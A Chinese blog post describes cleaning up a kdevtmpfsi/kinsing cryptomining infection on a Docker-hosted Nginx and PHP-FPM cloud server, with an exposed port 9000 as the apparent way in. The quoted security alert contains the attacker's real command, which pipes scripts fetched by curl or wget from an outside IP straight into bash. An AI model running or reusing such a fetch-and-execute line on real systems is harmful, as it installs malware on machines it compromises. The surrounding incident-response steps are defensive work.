• 云服务器处置挖矿病毒 kdevtmpfsi


    查看告警信息

    昨天刚在服务器中通过 docker 上线了一个 Nginx+PHP 站点(双容器链接),半夜时分就接收到了阿里云发来的告警信息。

    恶意脚本代码执行 紧急
    发生时间:2022-05-19 00:54:55
    IP:*** ***
    告警描述:检测模型发现您的服务器上正在执行恶意的Bash、Powershell、Python等脚本代码。
    
    异常事件详情
    命令行:curl -s http://185.14.30.35/ph.sh
    进程PID:14065
    进程文件名:curl
    父进程ID:14063
    父进程:bash
    父进程文件路径:/usr/bin/bash
    
    进程链:
    -[874]  /usr/bin/containerd
        -[13606]  containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/e83f2ef1bd970fffd1943c71f325f9e769cbb2cd4451d271a5fc317de2f7e6ac -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
            -[13613]  runc --root /var/run/docker/runtime-runc/moby --log /run/containerd/io.containerd.runtime.v1.linux/moby/e83f2ef1bd970fffd1943c71f325f9e769cbb2cd4451d271a5fc317de2f7e6ac/log.json --log-format json create --bundle /run/containerd/io.containerd.runtime.v1.linux/moby/e83f2ef1bd970fffd1943c71f325f9e769cbb2cd4451d271a5fc317de2f7e6ac --pid-file /run/containerd/io.containerd.runtime.v1.linux/moby/e83f2ef1bd970fffd1943c71f325f9e769cbb2cd4451d271a5fc317de2f7e6ac/init.pid e83f2ef1bd970fffd1943c71f325f9e769cbb2cd4451d271a5fc317de2f7e6ac
                -[13622]  php-fpm
                    -[13673]  php-fpm
                        -[14062]  sh -c [ -f "/bin/bash" ] && (curl -s http://185.14.30.35/ph.sh||wget -q -O- http://185.14.30.35/ph.sh)|bash || (curl -s http://185.14.30.35/ph2.sh||wget -q -O- http://185.14.30.35/ph2.sh)|sh
                            -[14063]  sh -c [ -f "/bin/bash" ] && (curl -s http://185.14.30.35/ph.sh||wget -q -O- http://185.14.30.35/ph.sh)|bash || (curl -s http://185.14.30.35/ph2.sh||wget -q -O- http://185.14.30.35/ph2.sh)|sh
    
    事件说明:云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于bash、powershell、python),请立刻排查入侵来源。如果是您的运维行为,请选择忽略。
    

    分析恶意代码来源

    基本上就是两种情况:一是外部攻破了防火墙,通过SSH或者注入执行的脚本;二是此前上线的站点中存在恶意代码。

    由于我使用的是密钥文件登录而禁用了密码,基本上可以确定是本地文件的问题。

    根据告警信息,提示了一个 IPv4地址的服务器。想都不用想,IP 地址肯定做了中转,一查显示“荷兰弗莱福兰”,直接略过。

    更重要的是 “php-fpm” 这一提示,说明 Nginx 交由 php-fpm 解析的文件中存在问题。

    进行处置

    停止运行

    SSH 上服务器后,top 查看有没有异常程序,发现了 CPU 满占用的进程 kdevtmpfsi 。网上搜索它其实是一个挖矿程序,由 kinsing 进程守护。

    ps -ef | grep kdevtmpfsi
    systemctl status [kdevtmpfsi PID]
    # 若病毒进程隐藏的好,或者像我使用的是轻量级应用服务器,这一步其实看不到什么信息
    ps -ef | grep kinsing
    
    kill -9 [kdevtmpfsi PID] [kinsing PID]
    # 临时强制停止服务,恶意程序会自启,要抓紧时间找到源文件
    

    找到病毒源文件

    find / -name "kdevtmpfsi"
    find / -name "kinsing"
    

    主机中搜索相关文件,发现在 /tmp/ 和类似 /var/lib/docker/ovorlay2/****/tmp/kdevtmpfsi 中找到文件。先删除能删的,无法删除的提示“无效句柄”的都在 docker 容器中。

    find / -name "kdevtmpfsi" | xargs rm -rf
    find / -name "kinsing" | xargs rm -rf
    

    因 Nginx 将 PHP 文件交由 php-fpm 容器渲染,恶意挖矿程序大概率在 php-fpm 容器中。

    现将上线的 PHP 文件打包备份用于之后在沙箱中分析,删除原 PHP 文件。

    接下来分析 php-fpm 容器中的进程,发现确实在该容器中运行。

    docker top php-fpm-rc
    

    docker 官方上传的镜像一般没有什么问题,需要将 php-fpm 容器(连同其数据卷一同)删除。

    至此,病毒理应不会再次上线。

    幸亏每次上线服务前,我都会存个快照,为防止病毒没有删除干净,恢复快照重新来过。

    沙箱分析

    通过沙箱分析未发现有恶意代码,考虑到 kdevtmpfsi 挖矿病毒出来时间已经几年了,分析结果应该可信。说明是服务器被攻击执行的恶意代码。

    检查服务器防火墙

    核实服务器端口权限

    官方 php-fpm 容器默认端口为 9000 ,可能攻击者因此会共计所有 9000端口开放的主机,所以需要配置访问来源规则 ***.***.***.***/0 ,或者修改为其他端口。而我使用的9000端口则是之前一个开放的访问端口,未作修改,现将端口权限修改再做测试。

  • 相关阅读:
    Introduction to Computer Science and Programming in Python--MIT
    随机变量及其分布
    条件期望与重期望
    Fourier级数
    Windows进程通信-共享内存空间
    windows网络编程-socket
    PE文件中找导出表
    PE文件结构体-IMAGE_DATA_DIRECTORY
    RVA到FOA的转换
    PE文件结构体-IMAGE_SECTION_HEADER
  • 原文地址:https://www.cnblogs.com/Yogile/p/16294943.html
Copyright © 2020-2023  润新知